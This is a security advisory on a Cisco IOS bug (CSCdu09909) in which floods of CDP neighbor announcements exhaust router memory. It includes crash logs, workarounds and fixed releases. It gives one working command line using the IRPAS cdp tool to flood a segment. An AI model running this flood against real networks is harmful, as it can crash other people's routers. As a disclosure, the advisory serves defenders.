Summary:
There is a vulnerability in the way Cisco routers are handling CDP. By sending a large amount of CDP neighbor announcements it is possible to consume all available router`s memory. That will cause a crash or some other abnormal behavior. This vulnerability is assigned a Cisco bug ID CSCdu09909.
In order to trigger this vulnerability an attacker must be on the same segment as the target router. This vulnerability cannot be exploited over the Internet unless an attacker has a helper program already planted on the internal network.
Known vulnerable combinations:
* Cisco 1005 IOS 11.1.*
* Cisco 1603 IOS 11.2, 11.3.11b
* Cisco 2503 IOS 12.0.19
* Cisco 2600 IOS 12.1.?
* Catalyst 2940XL IOS 12.0(5.1)XP
Not vulnerable versions:
* Catalyst 5505 CatOS 4.5(1)
The Cisco Discovery Protocol is a layer two protocol and therefore independent from layer three protocols configured on the device. A Cisco device sends out periodic updates out of its interfaces to make itself known to its neighbors. Since it is a layer two protocol, these packets (frames) are not routed. The updates are sent on Ethernet to the multicast address 01:00:0C:CC:CC:CC.
If a Cisco device receives a CDP frame from another device, it copies its contents into internal data structures that can be viewed by the operator using the `show cdp neighbors` command. The information includes the Device ID, capabilities, platform, and sender`s port ID. The CDP frames also include a hold timer value to tell the neighbor when he has to discard the information. The maximum values for this timer is 255 seconds (4 minutes, 15 seconds).
The internal data structure seems to use the remote device ID as key. When some IOS versions receive two identical but long device IDs, they mistakenly miss-identify them as non-identical and stores both of them as independent records.
When a network segment is flooded with large CDP frames containing a random device ID and coming from a random data link address, different IOS versions react differently. The range of possible reactions includes:
+ Reboot after 3 to 5 frames are received
+ Complete halt of the IOS after some thousands of frames
+ Use of all available memory to store CDP neighbor information until the hold timer expires
After the memory of the device is completely filled with CDP information, it is unable to perform other operations that need additional memory allocated. This includes accepting dynamic routing updates or new inbound telnet(1) sessions.
If an operator of the device console tries to debug the CDP traffic using the command `debug cdp packets`, all tested devices crashed.
Interesting is the reaction of the command line `shell` when flooding has commenced as seen in the example. It is not known if this behavior can be used for further exploitation of the device.
Example:
To send CDP messages, use the cdp sender tool from the Phenoelit IRPAS package. The command line to send maximum sized cdp frames with random data link addresses and device names is:
linuxbox# ./cdp -i eth0 -m0 -n 100000 -l 1480 -r -v
Be careful when running this! All vulnerable Cisco devices in the data link multicast domain will be affected.
Reation of a Cisco 1603 / IOS 11.2(4):
radio# %SYS-2-MALLOCFAIL: Memory allocation of 1480 bytes failed from 0x81B3BE6, pool Processor, alignment 0 -Process= "CDP Protocol", ipl= 0, pid= 9 -Traceback= 80ABDCC 80ACF46 81B3BEE 81B3B72 81B276A 81B224C
radio# %SYS-2-MALLOCFAIL: Memory allocation of 96 bytes failed from 0x81B26D2, pool Processor, alignment 0 -Process= "CDP Protocol", ipl= 0, pid= 9 -Traceback= 80ABDCC 80ACF46 81B26DA 81B224C
%SYS-2-MALLOCFAIL: Memory allocation of 96 bytes failed from 0x81B26D2, pool Processor, alignment 0 -Process= "CDP Protocol", ipl= 0, pid= 9 -Traceback= 80ABDCC 80ACF46 81B26DA 81B224C
radio#sh ?
% Unrecognized command
radio#show ?
% Unrecognized command
radio#
Reaction after `debug cdp packets`:
%Log packet overrun, potential memory corruption, PC 0x81B2720, format: %s
%Log packet overrun, potential memory corruption, PC 0x81B2720, format: %s
....[lots of these].....
%Log packet overrun, potential memory corruption, PC 0x81B2720, format: %s
%Log packet overrun, potential memory corruption, PC 0x81B2720, format: %s
*** BUS ERROR ***
access address = 0x5f227998
program counter = 0x80ad45a
status register = 0x2700
vbr at time of exception = 0x4000000
special status word = 0x0045
faulted cycle was a longword read
monitor: command "boot" aborted due to exception
System Bootstrap, Version .....
Copyright (c) 1994-1996 by Cisco Systems, Inc.
C1600 processor with 2048 Kbytes of main memory
program load complete, entry point: 0x4018060, size: 0x1da950
Workaround:
The workaround for this vulnerability is to disable CDP. In order to disable CDP for the whole router execute the following global command:
Router# configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)# no cdp run
Alternatively, CDP can be disabled on a particular interface. This can be done using the following commands:
Router# configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)# interface Ethernet0
Router(config-if)# no cdp enable
In this particular case, all customers are advised to disable CDP for the whole router.
This vulnerability has been fixed in the following interim images:
12.2(3.6)B
12.2(4.1)S
12.2(3.6)PB
12.2(3.6)T
12.1(10.1)
12.2(3.6)
All higher IOS releases should contain this fix.
Please note that interim images are built at regular intervals between maintenance releases and receives less testing. Interims should be selected only if there is no other suitable release that addresses the vulnerability, and interim images should be upgraded to the next available maintenance release as soon as possible. Interim releases are not available via manufacturing, and usually they are not available for customer download from CCO without prior arrangement with the Cisco TAC.
Additional information:
The information has been provided by
FX (fx@phenoelit.de)
Damir Rajnovic (gaus@cisco.com)
|
